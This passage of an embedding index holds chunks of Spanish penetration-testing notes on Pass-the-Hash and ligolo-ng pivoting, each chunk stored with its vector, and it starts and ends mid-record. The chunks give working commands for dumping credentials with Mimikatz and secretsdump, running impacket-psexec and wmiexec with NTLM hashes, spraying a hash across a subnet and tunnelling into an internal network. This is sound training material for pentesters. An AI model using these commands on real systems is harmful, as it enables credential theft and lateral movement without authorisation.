-0.00561, 0.0208, 0.00482, -0.04144, -0.01127, -0.01002, -0.04742, 0.00842, 0.02971, -0.01107, 0.00393, -0.06593, -0.03048, 0.00157, -0.01297]} +{"tipo": "metodologia", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "texto": "# Pass-the-Hash\n\n> Te autenticas con el **hash NTLM** sin conocer la contraseña en claro. La base del Movimiento lateral en AD.", "v": [-0.08538, -0.1097, -0.05836, -0.0719, -0.0217, -0.01304, -0.15007, 0.06456, -0.12962, 0.23112, -0.01084, 0.01277, 0.02681, 0.04826, 0.08713, 0.13088, 0.0649, -0.07676, -0.0191, 0.08752, 0.053, 0.00055, -0.18834, -0.03836, 0.08432, -0.0693, 0.0013, -0.01949, -0.16811, -0.05951, -0.07776, -0.02717, -0.09127, 0.1669, 0.05656, 0.04875, 0.00891, 0.04909, 0.01248, 0.19557, 0.08621, 0.22287, -0.05163, 0.15515, 0.06271, -0.06942, 0.01201, 0.01056, 0.06854, -0.11856, -0.03839, 0.02647, -0.15934, -0.11243, -0.03404, -0.11293, 0.1431, 0.10535, -0.06288, -0.01165, -0.06916, -0.02082, 0.04522, -0.07615, -0.04611, -0.06348, 0.07543, -0.03412, -0.01835, 0.02737, -0.00215, 0.11068, -0.03033, -0.05128, -0.00462, 0.03105, 0.05461, -0.01963, 0.08824, 0.12596, 0.01717, -0.07549, 0.06967, -0.05227, -0.12553, 0.00592, -0.01914, -0.08667, 0.02258, 0.00564, 0.08194, 0.03371, -0.01413, 0.03754, 0.02266, -0.05567, -0.05311, -0.03992, -0.10626, -0.06249, 0.00361, -0.0439, 0.0071, 0.11784, 0.00494, -0.03913, 0.06816, -0.01733, 0.07328, 0.05483, 0.10597, -0.08118, -0.07377, -0.03363, 0.01105, -0.0021, -0.00515, -0.0432, 0.02087, 0.01163, -0.02545, -0.03699, 0.03813, 0.01566, -0.00438, -0.00248, -0.0801, 0.11079, -0.07256, 0.00426, 0.09035, -0.02919, -0.06592, 0.02081, 0.00373, 0.03027, 0.0196, 0.00048, -0.04672, -0.07179, 0.03542, 0.0122, -0.02907, 0.03611, 0.08777, 0.0661, 0.03074, -0.05104, -0.08382, 0.04338, 0.01426, 0.00653, 0.03923, -0.00518, -0.00571, 0.03756, 0.00361, -0.07159, -0.09766, 0.09228, -0.01015, 0.02509, -0.08363, 0.03261, -0.07382, -0.02033, 0.05399, -0.00779, 0.00668, 0.00776, -0.00316, 0.01735, -0.00717, -0.02602, 0.04255, -0.04307, 0.00726, -0.07324, -0.01469, -0.05338, 0.0216, -0.09305, 0.02853, -0.05203, -0.02399, -0.0095, 0.01922, 0.01022, 0.02454, -0.0255, 0.0223, -0.00327, -0.05622, 0.09398, 0.00649, 0.01, 0.0, -0.096, 0.05331, -0.00822, 0.0168, 0.03767, 0.00668, -0.03454, 0.07757, 0.02264, -0.09724, 0.00819, -0.05188, 0.00957, 0.04807, -0.01589, 0.0395, -0.0358, -0.06027, -0.03256, 0.02282, 0.01586, 0.00282, 0.01188, 0.01151, 0.07246, 0.05305, 0.0715, 0.01353, -0.0346, -0.00342, 0.01868, -0.01758, 0.00766, 0.03062, 0.04742, -0.01541, -0.01834, 0.05949, 0.01931, -0.0432, -0.0062, -0.04465, -0.05562, 0.01796, 0.01122, 0.01064, -0.06686, -0.01444, 0.00932, -0.06591, 0.03065, 0.00709, -0.01006, -0.041, -0.0063, 0.0074, -0.05627, 0.01454, -0.0178]} +{"tipo": "metodologia", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "texto": "## De dónde sale el hash\n- Mimikatz `sekurlsa::logonpasswords`\n- secretsdump (SAM/NTDS)\n- `lsadump::sam`", "v": [-0.04024, -0.16953, -0.03891, -0.06137, -0.09123, -0.18546, -0.2402, 0.02313, -0.13127, 0.25009, -0.12043, -0.07264, 0.06481, -0.12808, -0.01163, 0.03795, 0.03382, -0.03635, -0.02132, 0.02778, 0.02912, -0.02124, -0.15548, -0.00078, 0.07386, -0.09934, 0.12437, 0.04143, -0.09344, -0.01472, -0.02842, -0.0256, -0.118, 0.03548, -0.05094, -0.07388, 0.01907, 0.02898, 0.08911, 0.23313, 0.03109, 0.12305, -0.02659, 0.10162, 0.0373, -0.1836, 0.00839, -0.05393, 0.15983, -0.15946, -0.14175, 0.08018, -0.05636, -0.10948, 0.06771, -0.06657, 0.03099, 0.07712, -0.06467, 0.14914, -0.02221, 0.00985, 0.09721, 0.00953, 0.11622, -0.12764, 0.07814, -0.08313, 0.03431, 0.11198, -0.04639, -0.05251, 0.05176, -0.07847, -0.00159, -0.01444, 0.04582, -0.02161, 0.14415, 0.08385, 0.01163, -0.10873, -0.00089, 0.03111, -0.05597, -0.06641, -0.03379, 0.0652, -0.02559, 0.00711, 0.00748, 0.06474, 0.09228, 0.00319, -0.03413, -0.03725, -0.00442, 0.00353, -0.04077, 0.01688, -0.04999, 0.00042, -0.08016, 0.03923, -0.06637, -0.02714, 0.01743, 0.04837, -0.00197, 0.01089, 0.13463, -0.05425, 0.01013, 0.01147, -0.01891, -0.01189, -0.00013, 0.05281, -0.00953, 0.06616, 0.02768, -0.02861, 0.06991, -0.05661, -0.01153, -0.01479, -0.03545, 0.0321, -0.01633, -0.00472, -0.01474, -0.01055, 0.01838, 0.01674, 0.06244, -0.03529, 0.0189, -0.03765, -0.0284, -0.06775, 0.03573, -0.08687, -0.00176, 0.05934, 0.06569, 0.0316, 0.00772, -0.02079, 0.00126, 0.01225, 0.04331, 0.00551, 0.02115, 0.02141, 0.06157, 0.03022, 0.06027, 0.00191, -0.05094, -0.05324, -0.01034, 0.08668, -0.01144, -0.00826, -0.02607, 0.00304, 0.02767, -0.03593, -0.03494, -0.12156, 0.02215, -0.02004, -0.01053, -1e-05, 0.01513, -0.05735, 0.0012, 0.00071, -0.05383, -0.06395, 0.05867, 0.01598, 0.03247, 0.00804, 0.01842, -0.02767, -0.0172, -0.01969, 0.00311, -0.03232, 0.01455, -0.02197, 0.002, -0.00397, 0.00893, 0.01898, -0.01281, -0.04348, 0.00612, -0.04469, 0.02854, 0.01977, 0.0061, -0.00896, -0.00084, -0.01521, -0.03441, 0.01788, -0.03878, -0.01206, 0.1214, 0.00705, 0.0155, -0.02484, -0.07876, -0.03196, -0.0543, 0.00561, 0.0039, -0.0182, -0.02799, 0.02257, 0.04161, 0.03935, -0.01158, 0.02991, -0.00611, -0.01518, 0.01613, 0.00844, 0.00789, 0.0613, -0.01609, -0.01155, 0.05622, -0.05218, -0.07055, 0.01438, -0.03347, -0.03166, 0.01071, 0.04231, 0.06078, -0.03776, 0.01818, -0.02233, -0.00142, -0.00282, 0.01602, 0.01629, -0.01658, -0.07313, -0.00124, 0.00053, -0.00766, -0.00516]} +{"tipo": "metodologia", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "texto": "## Uso\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' # → SYSTEM\nimpacket-wmiexec -hashes :NTLMHASH 'admin@10.10.10.20'\nnxc smb 10.10.10.0/24 -u admin -H NTLMHASH # spray del hash por la red\n```", "v": [-0.01654, -0.21432, 0.03587, -0.04584, -0.00522, -0.11367, -0.22004, 0.0137, -0.04678, 0.21838, -0.10779, 0.04108, 0.05065, -0.00037, -0.0304, 0.07265, -0.04544, -0.00405, -0.08501, 0.06338, 0.02203, 0.06998, -0.09554, 0.08667, 0.02068, -0.0152, -0.04727, 0.04476, -0.17991, -0.03613, -0.02794, -0.08347, -0.17048, 0.02188, 0.02659, 0.09769, 0.00553, 0.02832, 0.06495, 0.15993, 0.02348, 0.16169, 0.0125, 0.08821, 0.0205, -0.04033, 0.03453, -0.00922, 0.08087, -0.20265, 0.00185, 0.01195, -0.18128, -0.01579, -0.00545, 0.01985, 0.01959, 0.01098, -0.09515, -0.03076, 0.10938, 0.02583, 0.03898, -0.06722, -0.02372, -0.02495, 0.05561, -0.07475, -0.00459, 0.04526, -0.05548, 0.00329, 0.15386, -0.03456, 0.02527, 0.03897, 0.07071, -0.05531, 0.03709, 0.04883, 0.01297, -0.034, 0.01129, -0.12092, -0.07634, -0.02674, 0.03792, -0.01657, 0.01606, -0.00233, -0.02943, -0.12755, -0.06989, 0.00545, -0.04211, -0.06511, -0.0276, 0.00251, -0.00786, 0.04823, -0.02274, -0.06209, -0.0321, 0.0274, -0.02253, -0.01078, 0.03444, 0.0669, 0.04911, 0.0856, 0.08154, -0.06327, -0.01062, 0.06305, -0.01774, -0.06031, -0.08037, 0.02469, -0.06041, -0.0329, -0.0027, 0.09998, 0.10217, -0.02566, 0.05647, -0.11346, -0.03454, 0.04453, -0.04704, -0.04285, 0.01908, -0.00228, 0.021, 0.04673, 0.02246, 0.00405, -0.04182, 0.04261, -0.03682, -0.09053, 0.06762, 0.0318, -0.00433, -0.01365, 0.02477, 0.06874, 0.07057, -0.03278, -0.06912, 0.04381, 0.09115, -0.02934, 0.01067, -0.01055, -0.06294, 0.01967, -0.01205, 0.0057, -0.09732, -0.02015, 0.0196, 0.04706, 0.04749, 0.0307, -0.02927, 0.11856, 0.07586, -0.01925, -0.01194, -0.06722, -0.03269, 0.0261, -0.04689, 0.01948, -0.05244, 0.00059, 0.08324, -0.03598, -0.06996, -0.03448, 0.06244, -0.08895, 0.03939, -0.00769, 0.06993, 0.01374, -0.01784, 0.05643, -0.02905, 0.00502, -0.04765, -0.02432, 0.02855, 0.00187, 0.04363, 0.00662, 0.05142, 0.00593, 0.02348, 0.0603, 0.06025, 0.03899, 0.03436, -0.09074, 0.03634, -0.04934, 0.00012, 0.07065, 0.03877, 0.04898, 0.03632, 0.02581, -0.03138, -0.05647, -0.04624, -0.121, -0.00299, -0.02093, 0.0598, -0.04705, 0.04523, 0.0325, 0.01889, 0.04945, -0.01889, -0.03395, -0.00934, 0.03725, 0.07193, -0.00038, -0.08345, 0.03178, -0.08293, -0.03568, -0.01659, 0.0162, 0.02761, -0.01447, -0.07503, -0.03017, -0.08415, 0.10184, -0.00553, -0.04322, -0.03079, 0.00595, 0.01858, 0.02538, 0.00912, -0.02346, -0.01859, -0.06008, -0.03866, -0.10473, 0.02256, 0.15363]} +{"tipo": "metodologia", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "texto": "## Combos\n- **Reutilización**: prueba el hash/usuario contra **todos** los hosts (Metodología OSCP).\n- Password spraying: la misma pass de un user normal contra `administrator`, `sa`...\n- Hash de krbtgt → ya no es PtH, es Golden Ticket.\n\nRelacionado: Impacket · Movimiento lateral · OSCP MOC", "v": [-0.05541, -0.15498, 0.02154, -0.19876, -0.08638, -0.1889, -0.03815, 0.07907, -0.09158, 0.08046, -0.05617, 0.04983, 0.10221, 0.06399, -0.00739, -0.01615, 0.08876, 0.05953, -0.04934, 0.01927, -0.03919, 0.02083, -0.06988, 0.04923, 0.09786, 0.12905, -0.01502, 0.0581, -0.18281, -0.1232, -0.04918, -0.10354, -0.15545, 0.0521, -0.12902, -0.00253, -0.06997, 0.02977, 0.05667, 0.24403, 0.00243, 0.05849, -0.06743, 0.20037, 0.12694, -0.10002, 0.03962, 0.01433, -0.05187, -0.00028, -0.05439, -0.09063, -0.21896, -0.03632, 0.00169, -0.06162, 0.00175, -0.05105, -0.08057, -0.0253, -0.01375, 0.05018, -0.04277, -0.07934, 0.04328, -0.04892, -0.0013, -0.10589, -0.09357, 0.09037, -0.00156, 0.10011, -0.07896, 0.02772, 0.1236, 0.0309, 0.09132, 0.01896, 0.16613, 0.06857, -0.07957, -0.07116, 0.00317, -0.03597, -0.07558, -0.09526, 0.09425, -0.12616, -0.03571, -0.02224, 0.10703, 0.01315, 0.06743, -0.03845, 0.04866, -0.17827, 0.00478, -0.00964, -0.01885, -0.02621, -0.00209, 0.07425, -0.00326, 0.08032, 0.02137, -0.042, 0.1286, -0.02575, 0.09947, -0.07275, 0.07357, -0.02395, -0.03308, -0.0004, -0.01899, 0.01483, 0.02437, -0.02418, 0.01622, -0.01554, -0.0553, -0.013, 0.0439, 0.01811, 0.06358, -0.01894, -0.01134, 0.03424, -0.0279, 0.03961, -0.04259, 0.02949, -0.05993, 0.05068, -0.03848, 0.0428, 0.02161, -0.03982, 0.00783, 0.0204, 0.02963, 0.04571, -0.00485, 0.02365, 0.08099, -0.03112, -0.02702, -0.09135, -0.05965, 0.02062, 0.03448, 0.01716, 0.0115, 0.01751, -0.01921, -0.00816, 0.006, -0.06044, -0.03632, 0.0467, -0.00467, 0.0003, 0.04299, 0.03961, -0.05213, -0.02606, 0.0064, -0.04578, -0.01454, -0.04221, 0.05849, 0.00962, -0.04116, 0.02049, 0.01752, -0.05024, 0.02732, -0.06595, -0.01114, -0.07598, 0.03261, -0.03883, -0.00253, -0.01648, -0.00973, -0.00304, 0.06123, 0.0616, 0.07337, -0.02306, 0.02423, -0.01899, -0.01586, 0.03237, -0.00091, -0.02794, 0.02522, -0.0869, -0.00445, -0.00566, -0.03514, -0.00479, -0.00245, -0.03299, 0.03163, -0.04084, 0.0159, 0.01444, -0.03316, -0.01134, 0.03429, -0.005, 0.07914, -0.01137, -0.0512, -0.0097, 0.00238, 0.03278, -0.02022, -0.01563, 0.03034, 0.07952, 0.0064, 0.00903, 0.00057, -0.04039, 0.00606, -0.0221, 0.01515, 0.03343, -0.00641, 0.01089, 0.02832, -0.02752, 0.0643, -0.01938, -0.00914, -0.03284, -0.03407, -0.07319, -0.00294, 0.01634, 0.01001, -0.00415, -0.06583, -0.02351, -0.03468, 0.00455, 0.03972, -0.0381, -0.01271, -0.05749, -0.01025, -0.09882, -0.00392, 0.00685]} +{"tipo": "metodologia", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "texto": "# Pivoting (ligolo-ng)\n\n> Entrar en una **red interna** no enrutable desde Kali, a través de una máquina comprometida. En `tu carpeta`.", "v": [-0.01405, -0.04366, -0.12225, 0.08511, 0.06663, -0.19468, 0.01505, 0.10651, -0.04483, -0.11541, -0.07792, -0.07718, 0.00721, -0.07534, 0.04367, 0.0583, -0.10532, -0.00822, 0.11807, -0.08772, -0.14188, 0.14024, -0.0367, -0.01611, -0.0334, 0.18288, 0.08036, 0.02104, -0.14394, 0.02652, -0.11321, -0.02731, 0.01699, -0.10817, 0.06273, -0.08258, 0.06667, 0.10714, -0.03049, 0.0791, 0.04903, 0.18098, -0.04198, 0.0539, 0.13077, -0.04951, 0.2393, -0.002, 0.04189, 0.1725, -0.07693, -0.01826, -0.0019, -0.08247, 0.0182, -0.1699, 0.03888, -0.02293, 0.03305, -0.04495, 0.03057, -0.03395, -0.13927, 0.04453, -0.01483, 0.0234, 0.04343, 0.05698, -0.04296, 0.07415, 0.00844, 0.05107, 0.0095, -0.03931, 0.10962, 0.00202, -0.01672, -0.09238, 0.04437, 0.05179, -0.01228, -0.03671, -0.05845, -0.03255, 0.00779, -0.15407, 0.13427, -0.06242, 0.02691, -0.00815, 0.07156, -0.07534, 0.01263, 0.08053, 0.09889, 0.02215, -0.05837, -0.03366, 0.01041, -0.06185, 0.02468, 0.07029, -0.12229, 0.01127, -0.02194, 0.04775, -0.01548, 0.01609, 0.09466, -0.04417, 0.11935, 0.013, 0.01492, -0.04443, 0.01805, -0.00476, 0.02338, 0.03447, -0.04384, -0.02622, -0.08491, 0.00132, 0.00719, -0.00457, -0.01369, -0.0992, -0.04432, 0.02419, -0.03498, 0.05182, -0.05952, -0.01014, -0.13953, -0.0182, 0.00366, -0.03421, 0.00315, -0.09546, 0.03673, 0.01497, 0.04744, 0.00566, -0.03626, -0.00607, -0.05445, 0.08926, 0.00918, -0.10336, -0.07626, 0.09938, 0.01331, 0.02109, 0.00561, 0.06151, -0.01207, 0.08294, 0.02306, -0.05359, -0.08952, 0.01059, 0.00354, -0.03581, 0.05144, 0.02922, 0.0109, -0.01275, -0.02242, -0.06298, -0.01623, -0.05584, -0.05545, -0.00046, -0.02205, -0.04315, -0.06364, -0.01569, 0.05945, -0.08533, -0.05218, -0.01609, 0.02142, 0.01113, -0.0137, -0.04323, -0.06939, 0.0167, 0.03984, -0.01778, 0.01057, -0.09362, 0.01187, -0.00611, -0.00443, 0.05242, 0.03839, 0.05401, -0.04175, -0.00104, -0.0008, -0.02548, -0.09565, 0.05998, -0.07815, 0.0054, 0.0329, 0.01212, -0.0379, 0.00534, -0.0763, 0.04332, 0.04199, 0.04095, 0.01113, 0.02636, -0.03707, -0.01945, -0.0121, 0.03005, 0.00585, -0.01421, 0.05939, -0.05056, 0.04294, -0.00945, -0.01631, -0.02261, -0.01113, 0.00177, -0.05198, -0.00255, 0.05235, -0.01581, 0.00668, -0.09797, -0.01153, -0.0209, 0.04891, 0.01328, 0.00154, -0.08416, -0.00299, 0.03749, -0.02498, -0.01262, -0.00691, -0.06279, -0.02271, 0.03484, -0.0186, -0.03065, -0.00524, -0.0183, -0.03304, -0.10267, -0.00048, -0.00039]} +{"tipo": "metodologia", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "texto": "## El concepto\n```\nKALI 10.10.10.5 ── túnel ──> USER1 10.10.10.50 ── llega a ──> 192.168.5.0/24 (DC interno)\n```\n- **proxy** corre en Kali, **agent** en la víctima.\n- Añades una ruta y las tools tiran por el túnel **transparentemente**.", "v": [0.05685, -0.14896, -0.04421, 0.02745, -0.01478, -0.08002, -0.07239, 0.14109, 0.03234, 0.1353, -0.06939, -0.10551, -0.00753, -0.00956, -0.09924, -0.08803, -0.06185, -0.04422, 0.07104, 0.04931, -0.00505, -0.01828, 0.03654, -0.01175, 0.01726, 0.07052, 0.00686, -0.06838, -0.01133, -0.12159, 0.04685, -0.03627, -0.04212, -0.10418, 0.08196, 0.0337, -0.08535, 0.15685, 0.04236, 0.07723, 0.02007, 0.03847, -0.0276, 0.10382, 0.05698, -0.01061, 0.02883, 0.01552, 0.06379, -0.10935, -0.0516, -0.04444, -0.10763, 0.01315, 0.1204, -0.00779, 0.09775, 0.0385, 0.03539, -0.06327, 0.20544, -0.02789, -0.04098, 0.01066, 0.10217, -0.07104, 0.07233, -0.0928, -0.09927, -0.06209, -0.00743, -0.01531, 0.05403, -0.02677, 0.04677, 0.00951, 0.06435, -0.05244, 0.04323, 0.06224, 0.01096, 0.03338, -0.10214, -0.12921, -0.07957, -0.09044, 0.04705, -0.0467, 0.01842, -0.05028, -0.11501, -0.04084, 0.0063, 0.10872, 0.01199, -0.04633, 0.00433, 0.06227, 0.0103, -0.02906, 0.0534, -0.04754, -0.08104, 0.07882, 0.09358, 0.03827, -0.02364, -0.04631, 0.04712, 0.05256, -0.00186, 0.07454, 0.04536, -0.09229, -0.03607, 0.02057, -0.0858, 0.03483, 0.02861, 0.0032, 0.03072, 0.06538, -0.04221, -0.04129, -0.00631, -0.10397, -0.1504, 0.0229, 0.069, -0.02546, -0.01907, 0.0716, -0.08961, -0.00307, 0.03423, -0.00333, 0.01533, 0.03633, 0.01823, -0.02164, 0.07892, -0.06443, -0.02667, -0.08295, 0.01624, 0.04713, 0.04435, -0.07704, -0.11145, 0.07843, 0.01431, 0.03009, -0.00815, 0.00081, 0.02999, -0.02348, -0.0257, -0.07388, -0.04998, 0.09437, 0.07039, 0.08108, 0.08492, -0.00647, -0.01014, 0.0567, 0.04464, -0.07991, 0.05449, -0.06846, 0.01789, 0.03898, -0.04658, 0.00717, -0.07738, -0.02802, 0.06421, -0.11055, -0.04764, -1e-05, 0.08349, -0.09594, 0.0163, 0.05372, 0.01178, -0.05887, 0.02107, -0.08042, 0.03975, 0.036, -0.07221, -0.07315, 0.0509, -0.03458, -0.00096, 0.02916, 0.03104, 0.04713, 0.06922, -0.01115, -0.00109, -0.00081, 0.06968, -0.11938, 0.02613, -0.04776, 0.03924, 0.00444, 0.05571, 0.1011, 0.079, -0.02979, -0.0318, -0.03898, -0.04603, -0.09504, 0.06549, -0.08812, 0.03505, -0.0242, 0.05705, 0.03591, 0.01987, 0.01479, 0.00817, 0.02618, -0.00946, 0.0422, 0.04122, -0.00745, -0.07458, 0.06229, -0.0892, -0.08925, -0.00909, 0.04132, 0.03024, 0.01136, -0.07944, -0.047, -0.06295, 0.11401, -0.00864, -0.06237, -0.08117, 0.02093, 0.06283, 0.04528, -0.0294, -0.05326, -0.04686, -0.00892, 0.00047, -0.16034, 0.09096, 0.03001]} +{"tipo": "metodologia", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "texto": "# Kali (proxy):\nsudo ip tuntap add user $USER mode tun ligolo && sudo ip link set ligolo up\n./proxy -selfcert", "v": [0.02939, -0.05796, -0.22084, -0.0564, 0.1613, -0.18654, -0.00642, -0.09591, -0.05838, 0.0234, -0.10743, -0.122, 0.0246, -0.13982, -0.13764, -0.06262, -0.07758, -0.06826, 0.05937, -0.10007, 0.0511, 0.18454, -0.06472, -0.11398, 0.03594, 0.12103, 0.10543, -0.07367, -0.02088, -0.12575, -0.17433, -0.01091, 0.00459, -0.02801, -0.08795, -0.06503, 0.06954, 0.11177, 0.03412, 0.18102, 0.08097, -0.04824, -0.10081, -0.00199, 0.04183, -0.00116, 0.03152, -0.0817, 0.09303, -0.03498, 0.005, -0.10733, -0.09807, -0.03125, -0.03487, 0.04079, 0.08543, -0.13803, 0.01025, 0.02926, -0.12256, -0.02453, 0.05945, 0.02588, 0.04317, 0.01477, -0.11709, 0.03005, -0.17514, 0.01287, -0.10969, -0.00195, -0.04561, 0.01586, 0.05871, -0.00387, 0.04491, -0.09659, 0.1183, 0.02205, -0.0073, -0.00786, -0.07735, -0.01688, -0.17103, -0.03543, -0.00625, -0.03972, 0.07241, -0.0592, 0.13873, -0.00012, 0.06815, 0.05567, 0.09207, -0.03538, -0.01731, -0.02679, -0.00325, -0.04052, 0.00818, 0.04795, -0.07986, 0.03212, 0.12979, 0.0433, -0.00195, 0.03149, -0.01309, 0.05277, 0.03367, 0.03619, -0.01348, -0.10851, 0.07106, -0.00563, -0.07875, -0.00374, 0.05879, -0.10082, -0.04494, -0.09276, 0.01548, -0.01784, -0.01199, -0.0342, -0.00645, 0.05533, 0.00824, 0.02889, 0.04084, -0.0637, -0.04484, -0.05358, -0.01716, 0.08815, 0.01794, -0.05469, -0.06831, -0.01296, -0.00149, 0.03416, -0.07258, -0.0019, 0.06697, 0.04631, -0.04901, -0.07323, -0.03413, -0.02586, -0.04763, 0.02675, -0.02708, 0.00675, -0.09547, 0.01355, -0.02316, -0.06503, 0.05949, 0.06907, 0.02777, -0.00832, -0.00095, 0.02237, 0.01421, 0.01757, -0.02136, -0.02216, 0.07773, -0.06823, -0.06219, 0.05276, -0.0174, -0.10357, -0.03164, -0.03948, 0.04666, -0.05692, 0.00063, -0.01592, 0.04816, -0.02144, 0.00116, 0.01255, -0.05892, -0.02195, 0.02713, 0.00304, -0.00226, 0.02624, -0.02521, 0.04017, -0.04053, 0.01891, 0.05995, 0.00183, -0.03515, -0.07286, -0.04564, -0.00169, -0.0398, 0.0243, 0.01699, 0.00315, -0.08266, -0.06017, 0.00229, 0.00469, -0.02369, 0.05235, 0.03971, -0.04331, 0.02387, 0.01987, -0.0225, -0.01773, -0.02606, -0.00084, -0.02389, -0.0241, -0.04412, 0.04449, 0.03138, -0.03353, -0.01261, 0.00501, 0.01364, -0.00082, 0.02964, 0.04232, -0.03035, 0.02123, -0.02201, -0.07941, 0.01121, -0.03178, 0.011, 0.00329, 0.00573, -0.0224, -0.01081, 0.01824, 0.03046, -0.07594, -0.06578, -0.02244, -0.02652, 0.04022, 0.00949, 0.01031, 0.04136, 0.01222, -0.03992, -0.03714, -0.02829, 0.01012]} +{"tipo": "metodologia", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "texto": "# En la consola de ligolo: session → start ; luego en Kali:\nsudo ip route add 192.168.5.0/24 dev ligolo\n```", "v": [-0.05545, -0.05545, -0.26566, 0.01871, -0.08708, -0.30282, -0.02003, -0.07023, -0.05923, 0.03187, -0.09689, -0.16301, -0.02183, -0.18966, -0.06072, -0.09171, -0.01576, -0.02935, 0.01865, -0.11752, -0.08653, 0.20705, 0.03414, -0.0367, 0.13532, 0.08201, 0.14588, 0.00799, -0.01069, -0.08003, -0.07913, -0.10328, -0.01529, -0.05967, -0.01834, -0.0057, 0.03798, 0.11438, -0.03478, 0.09819, 0.01511, 0.02748, -0.1008, -0.02984, 0.0419, -0.1132, 0.12821, -0.01372, 0.04104, -0.04426, 0.06472, 0.02955, 0.06252, -0.08138, -0.02325, -0.02301, 0.11025, -0.1137, 0.04318, 0.01492, -0.00733, -0.02154, -0.02863, 0.00471, 0.02922, 0.00599, -0.0787, 0.02647, -0.12156, 0.05749, -0.12728, 0.09616, -0.08612, 0.00154, 0.09171, 0.00177, 0.01302, -0.01125, 0.06354, 0.02787, -0.07164, -0.03453, -0.0297, -0.09467, -0.16361, -0.00728, 0.04467, -0.00833, 0.01705, 0.02291, -0.01733, -0.04156, 0.0554, 0.0177, 0.05115, -0.04902, 0.03043, 0.07632, 0.0634, -0.07618, 0.01316, 0.11183, -0.04213, 0.05248, 0.10593, 0.01616, 0.02629, -0.01912, -0.01381, 0.02293, 0.03246, 0.10333, 0.01939, -0.03855, 0.05435, 0.05036, -0.11608, 0.09129, 0.03039, 0.00112, -0.04988, -0.00561, -0.00942, -0.00237, -0.03853, -0.06776, -0.06213, -0.00381, 0.05227, 0.01007, 0.03794, -0.14337, -0.13956, -0.00092, -0.05532, 0.04443, -0.02942, 0.03024, -0.04431, -0.02854, 0.06725, 0.02808, -0.03819, -0.02734, 0.07258, 0.13062, -0.05711, -0.0572, -0.05819, 0.04277, 0.03938, 0.04956, -0.03411, 0.00074, 0.01098, 0.07102, -0.00261, -0.05158, -0.04478, 0.08941, 0.04502, 0.02051, -0.00271, -0.001, 0.02459, -0.00714, -0.04907, -0.03291, 0.06539, -0.0825, -0.02989, 0.03605, -0.02879, -0.05607, -0.05838, -0.01457, 0.01413, 0.01901, -0.02422, -0.00742, 0.03376, -0.05148, -0.01857, -0.01769, -0.0237, 0.00439, -0.0316, -0.06566, 0.01727, -0.01551, -0.01459, -0.02762, -0.07816, -0.00231, 0.05149, 0.0352, 0.004, -0.03479, -0.07957, 0.01018, -0.00257, 0.04778, -0.07778, -0.01629, -0.03755, -0.00095, -0.01238, -0.04257, -0.00848, 0.01419, 0.02999, 0.02776, 0.06828, 0.04076, -0.00547, -0.01857, 0.01953, -0.02489, 0.02997, -0.04593, -0.00991, 0.02531, 0.03958, -0.05661, 0.00816, 0.00968, -0.01575, 0.01526, -0.03072, -0.02848, -0.03964, 0.00186, -0.00448, -0.05355, -0.027, -0.01588, 0.04641, 0.04763, 0.0275, 0.00016, -0.00707, -0.00805, 0.01184, -0.06588, -0.04025, -0.03121, -0.05078, -0.00318, 0.02886, 0.00942, -0.02693, -0.014, 0.04869, -0.05508, -0.05281, 0.00799]} +{"tipo": "metodologia", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "texto": "## Resultado\n```bash\nimpacket-psexec admin@192.168.5.10 # el tráfico va por el túnel, transparente\n```\nAhora Movimiento lateral y Active Directory funcionan contra la red interna.\n\nRelacionado: Puesto de mando Kali · OSCP MOC", "v": [-0.15468, -0.061, -0.04183, -0.1015, -0.12494, -0.11307, -0.01759, 0.07677, -0.03891, 0.09805, -0.02677, -0.09079, 0.03011, -0.00815, 0.01186, 0.05948, -0.02031, -0.04789, 0.07371, -0.07831, -0.05642, -0.07201, -0.08597, 0.01453, 0.18728, 0.16582, -0.04493, -0.0844, -0.11648, -0.17936, 0.03583, -0.05175, 0.019, 0.04964, 0.02196, -0.03093, -0.0671, 0.02493, 0.04328, 0.17745, -0.09129, -0.00313, -0.17857, 0.09265, 0.09116, -0.05196, 0.08726, -0.07426, 0.04209, -0.07615, -0.03862, -0.14723, -0.14464, 0.01079, 0.06511, -0.0109, 0.06744, 0.01958, -0.05178, -0.10669, 0.13052, 0.02086, -0.03324, 0.03955, -0.01781, -0.06146, 0.13157, -0.05545, -0.09045, 0.02897, 0.01082, 0.19007, -0.09013, 0.1385, 0.03058, 0.04537, 0.06143, 0.06203, 0.0661, 0.1325, -0.04181, 0.05842, 0.00253, -0.03062, -0.0355, -0.09351, 0.07631, -0.11025, -0.03629, -0.00846, -0.00686, 0.03746, -0.00687, 0.05292, 0.07766, 2e-05, -0.04934, 0.01655, 0.00191, -0.03961, -0.00139, 0.10704, -0.03327, 0.02038, 0.08706, 0.07106, 0.00837, -0.03313, 0.08419, 0.08944, 0.03219, -0.00202, 0.06228, -0.04819, 0.0143, 0.02538, -0.04813, 0.03559, -0.06787, -0.03311, -0.03379, 0.09213, 0.02613, -0.0346, -0.05749, -0.07443, -0.03227, 0.05859, 0.05324, 0.06741, -0.01589, -0.03589, -0.05659, -0.08985, -0.089, -0.04502, -0.06273, 0.03395, 0.02947, -0.05543, 0.06605, -0.07951, 0.03143, -0.04093, 0.04559, 0.0458, 0.02681, -0.0526, 0.00871, 0.10699, 0.02809, -0.02074, -0.01702, -0.05127, 0.07906, 0.03233, -0.05497, -0.059, 